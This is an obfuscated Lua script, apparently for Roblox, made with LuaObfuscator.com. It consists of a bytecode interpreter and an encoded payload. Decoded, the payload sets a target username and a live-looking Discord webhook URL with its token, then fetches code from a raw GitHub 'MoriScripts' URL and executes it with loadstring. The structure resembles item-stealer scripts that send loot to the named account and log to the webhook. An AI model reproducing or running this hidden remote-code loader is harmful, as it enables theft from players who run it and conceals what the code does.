--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v81=0 -0 ;local v82;while true do if (v81==(0 -0)) then v82=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(1271 -(226 + 1044))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v82-(v82%((4040 -3112) -(214 + 713))) ;end end else local v83=0 + 0 ;local v84;while true do if (v83==(0 + 0)) then v84=(879 -(282 + (712 -(32 + 85))))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v84 + v84))>=v84) and (1 + (1065 -(68 + 997)))) or (0 -0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 1 + 3 ;return (v37 * (16778173 -(892 + 65))) + (v36 * ((288978 -132641) -90801)) + (v35 * 256) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==(1 + 0)) then v41=nil;v42=nil;v38=2;end if (v38~=(0 -0)) then else v39=0;v40=nil;v38=3 -2 ;end if (v38~=(1049 -(67 + 980))) then else v43=nil;v44=nil;v38=1477 -(1329 + 145) ;end if ((974 -(140 + 831))~=v38) then else v45=nil;while true do local v89=0;while true do if (v89==(1850 -(1409 + 441))) then if (v39==1) then local v100=0;while true do if (1==v100) then for v119=719 -(15 + 703) ,v44 do local v120=0;local v121;local v122;local v123;while true do if (v120==1) then v123=nil;while true do if (v121~=1) then else if (v122==1) then v123=v22()~=(0 + 0) ;elseif (v122==2) then v123=v25();elseif (v122~=3) then else v123=v26();end v45[v119]=v123;break;end if (v121~=0) then else local v171=0;while true do if (v171==(438 -(262 + 176))) then v122=v22();v123=nil;v171=1;end if (1==v171) then v121=1722 -(345 + 1376) ;break;end end end end break;end if (v120~=(688 -(198 + 490))) then else local v140=0;while true do if (v140==(0 -0)) then v121=0 -0 ;v122=nil;v140=1207 -(696 + 510) ;end if (v140~=(1 -0)) then else v120=1;break;end end end end end v43[3]=v22();v100=1264 -(1091 + 171) ;end if (0==v100) then v44=v24();v45={};v100=1 + 0 ;end if (v100~=2) then else v39=6 -4 ;break;end end end if (v39==2) then local v101=0 -0 ;while true do if (0~=v101) then else for v124=375 -(123 + 251) ,v24() do local v125=0 -0 ;local v126;local v127;while true do if (v125==(698 -(208 + 490))) then v126=0 + 0 ;v127=nil;v125=1;end if (v125==1) then while true do if (v126==(0 + 0)) then v127=v22();if (v21(v127,837 -(660 + 176) ,1)==0) then local v172=0;local v173;local v174;local v175;local v176;local v177;local v178;while true do if ((1 + 1)==v172) then v177=nil;v178=nil;v172=3;end if ((202 -(14 + 188))~=v172) then else v173=675 -(534 + 141) ;v174=nil;v172=1;end if (v172==(1 + 0)) then v175=nil;v176=nil;v172=2 + 0 ;end if (v172==3) then while true do if (v173==1) then v176=nil;v177=nil;v173=2;end if (v173==(2 + 0)) then v178=nil;while true do if (v174==(1 -0)) then local v180=0 -0 ;local v181;while true do if (v180~=0) then else v181=0 -0 ;while true do if (v181==(1 + 0)) then v174=2 + 0 ;break;end if (v181~=0) then else v177=nil;v178=nil;v181=1;end end break;end end end if (v174==(396 -(115 + 281))) then local v182=0;while true do if (v182==(0 -0)) then local v183=0;while true do if (v183==0) then v175=0 + 0 ;v176=nil;v183=1;end if (v183~=1) then else v182=2 -1 ;break;end end end if (v182==1) then v174=1;break;end end end if (v174~=(7 -5)) then else while true do if (v175==(868 -(550 + 317))) then local v184=0;while true do if (1==v184) then v175=2 -0 ;break;end if (v184==0) then local v191=0 -0 ;while true do if (v191==0) then v178={v23(),v23(),nil,nil};if (v176==(285 -(134 + 151))) then local v195=0;while true do if (v195==(1665 -(970 + 695))) then v178[3]=v23();v178[7 -3 ]=v23();break;end end elseif (v176==(1991 -(582 + 1408))) then v178[10 -7 ]=v24();elseif (v176==(2 -0)) then v178[11 -8 ]=v24() -((1826 -(1195 + 629))^(20 -4)) ;elseif (v176==(244 -(187 + 54))) then local v200=780 -(162 + 618) ;local v201;local v202;while true do if (v200==(0 + 0)) then v201=0;v202=nil;v200=1;end if (v200==(1 + 0)) then while true do if (v201==0) then v202=0;while true do if (v202==0) then v178[6 -3 ]=v24() -(2^(26 -10)) ;v178[4]=v23();break;end end break;end end break;end end end v191=1;end if (v191~=(1 + 0)) then else v184=1637 -(1373 + 263) ;break;end end end end end if (v175==2) then local v185=1000 -(451 + 549) ;local v186;while true do if ((0 + 0)~=v185) then else v186=0;while true do if (v186==1) then v175=3;break;end if (v186~=0) then else local v193=0;local v194;while true do if (v193~=0) then else v194=0;while true do if ((0 -0)==v194) then if (v21(v177,1 -0 ,1)==(1385 -(746 + 638))) then v178[2]=v45[v178[1 + 1 ]];end if (v21(v177,2 -0 ,2)~=1) then else v178[3]=v45[v178[344 -(218 + 123) ]];end v194=1;end if (v194~=1) then else v186=1582 -(1535 + 46) ;break;end end break;end end end end break;end end end if (v175==3) then if (v21(v177,3 + 0 ,1 + 2 )==(561 -(306 + 254))) then v178[4]=v45[v178[4]];end v40[v124]=v178;break;end if (v175~=(0 + 0)) then else local v188=0 -0 ;while true do if ((1468 -(899 + 568))==v188) then v175=1 + 0 ;break;end if (v188==0) then local v192=0 -0 ;while true do if (v192==0) then v176=v21(v127,605 -(268 + 335) ,293 -(60 + 230) );v177=v21(v127,4,578 -(426 + 146) );v192=1;end if (v192==1) then v188=1;break;end end end end end end break;end end break;end if (v173~=(0 + 0)) then else local v179=0;while true do if (v179~=(1456 -(282 + 1174))) then else v174=0;v175=nil;v179=1;end if (v179==1) then v173=812 -(569 + 242) ;break;end end end end break;end end end break;end end break;end end end for v128=2 -1 ,v24() do v41[v128-1 ]=v29();end v101=1;end if (v101==1) then return v43;end end end v89=1 + 0 ;end if (1==v89) then if (v39~=0) then else local v102=1024 -(706 + 318) ;while true do if (v102~=(1253 -(721 + 530))) then else v39=1272 -(945 + 326) ;break;end if (v102==(2 -1)) then v42={};v43={v40,v41,nil,v42};v102=2;end if (v102~=0) then else local v115=0 + 0 ;while true do if (v115==(1500 -(1408 + 92))) then v40={};v41={};v115=1087 -(461 + 625) ;end if (v115==1) then v102=1;break;end end end end end break;end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=1289 -(993 + 295) ;local v49=(v21(v47,1 + 0 ,1191 -(418 + 753) ) * (((2 -1) + 1)^(4 + 28))) + v46 ;local v50=v21(v47,7 + 14 ,8 + 23 );local v51=((v21(v47,32)==(530 -(406 + 123))) and  -(1770 -(1749 + 20))) or ((2 -1) + 0) ;if (v50==0) then if (v49==(114 -(4 + 110))) then return v51 * 0 ;else local v90=(1906 -(57 + 527)) -(1249 + 73) ;while true do if (v90==(0 + 0)) then v50=1;v48=1145 -(466 + 679) ;break;end end end elseif (v50==2047) then return ((v49==(0 -0)) and (v51 * ((2 -(1428 -(41 + 1386)))/(1900 -(106 + 1794))))) or (v51 * NaN) ;end return v8(v51,v50-(324 + 699) ) * (v48 + (v49/((1 + 1)^52))) ;end v26=nil;function v26(v52)local v53=103 -(17 + 86) ;local v54;local v55;while true do if (v53==(3 + 0)) then return v6(v55);end if (2==v53) then v55={};for v91=1, #v54 do v55[v91]=v2(v1(v3(v54,v91,v91)));end v53=6 -3 ;end if (v53==(2 -1)) then v54=v3(v16,v19,(v19 + v52) -((337 -170) -(122 + 44)) );v19=v19 + v52 ;v53=2 -0 ;end if (v53==((65 -(30 + 35)) -0)) then v54=nil;if  not v52 then v52=v24();if (v52==(0 + 0)) then return "";end end v53=1 + 0 ;end end end v18=5;end if (v18==2) then function v22()local v56=(0 -0) + 0 ;local v57;while true do if (v56==(1258 -(1043 + 214))) then return v57;end if (v56==(0 -0)) then v57=v1(v16,v19,v19);v19=v19 + (1213 -(323 + 889)) ;v56=581 -(361 + 219) ;end end end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + (322 -(53 + 267)) );v19=v19 + 1 + 1 ;return (v59 * (669 -(15 + 398))) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then local v85=0;while true do if (v85==0) then v20=v0(v3(v60,1,1));return "";end end else local v86=v2(v0(v60,16));if v20 then local v93=v5(v86,v20);v20=nil;return v93;else return v86;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v28;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v88=0;while true do if (v88==1) then if (v80<=4) then if (v80<=1) then if (v80>0) then v77[v79[2]]=v79[3]~=0 ;else v63[v79[3]]=v77[v79[2]];end elseif (v80<=2) then v77[v79[2]]=v63[v79[3]];elseif (v80==3) then v77[v79[2]]();else local v130=0;local v131;local v132;while true do if (v130==5) then v77[v79[2]]=v63[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v63[v79[3]];v130=6;end if (v130==6) then v71=v71 + 1 ;v79=v67[v71];v132=v79[2];v131=v77[v79[3]];v130=7;end if (v130==3) then v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v130=4;end if (0==v130) then v131=nil;v132=nil;v77[v79[2]]=v79[3];v71=v71 + 1 ;v130=1;end if (v130==1) then v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v130=2;end if (v130==7) then v77[v132 + 1 ]=v131;v77[v132]=v131[v79[4]];v71=v71 + 1 ;v79=v67[v71];v130=8;end if (v130==2) then v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v63[v79[3]]=v77[v79[2]];v130=3;end if (v130==4) then v79=v67[v71];v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];v130=5;end if (v130==8) then v77[v79[2]]=v79[3];break;end end end elseif (v80<=6) then if (v80>5) then v77[v79[2]]=v79[3];else do return;end end elseif (v80<=7) then local v110=v79[2];local v111,v112=v70(v77[v110](v13(v77,v110 + 1 ,v79[3])));v72=(v112 + v110) -1 ;local v113=0;for v116=v110,v72 do v113=v113 + 1 ;v77[v116]=v111[v113];end elseif (v80==8) then local v133=0;local v134;while true do if (0==v133) then v134=v79[2];v77[v134]=v77[v134](v13(v77,v134 + 1 ,v72));break;end end else local v135=v79[2];local v136=v77[v79[3]];v77[v135 + 1 ]=v136;v77[v135]=v136[v79[4]];end v71=v71 + 1 ;break;end if (v88==0) then v79=v67[v71];v80=v79[1];v88=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!093O0003083O00557365724E616D65030B3O006C756B6974615F3033303103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31353330313837393035382O3633343337332F7A394A6A5A735874453734513456476D5141597578434B61706446556C45724C6D6F373234676C52344673566C7057666A444A564B7562687A7830744E4443664565506C03093O00557365724E616D6532030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F726953637269707473000F3O0012043O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00122O000100073O00202O00010001000800122O000300094O0001000400014O0007000100044O00085O00022O00033O000100012O00053O00017O00",v9(),...);
